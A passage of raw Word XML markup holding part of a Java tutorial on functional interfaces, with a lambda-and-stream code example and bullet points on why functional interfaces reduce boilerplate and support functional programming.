          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C792EE" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> words </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asList</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"apple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C67C9" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06741F" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using lambda expression with functional interface Predicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A18487" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        words</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6622E3" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>startsWith</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45550AE6" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FE861" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06786A40" w14:textId="21BD5501" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882A273" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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7. Simplifies Codebase and Reduces Boilerplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069EE2CF" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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pre-Java 8, we used anonymous classes for passing behavior, which involved repetitive boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FC830" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ith functional interfaces, Java allows you to pass behavior without creating separate classes or objects, simplifying your codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F9AA1" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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8. Support for Custom Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BBC703" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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Java allows you to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that fit your specific needs. This flexibility allows you to create clean and maintainable code without relying on predefined functional interfaces like Runnable or Callable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D2147" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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 Why We Need Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22427444" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nables Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide more concise and expressive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A731584" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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mproves Code Readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by allowing behavior to be passed as parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D475D" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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upports Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> paradigms, such as immutability and statelessness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04778F88" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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creases Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and flexibility by allowing you to pass around behavior as data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA1896" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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orks seamlessly with the Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write more declarative and functional-style code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591E3DEF" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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duces Boilerplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by removing the need for anonymous classes in many cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AD502" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A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040AB01B" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A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Functional interfaces are crucial to making Java a more powerful, expressive, and functional language. They allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cleaner</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more flexible</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readable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code by leveraging </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and supporting </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming techniques</w:t>
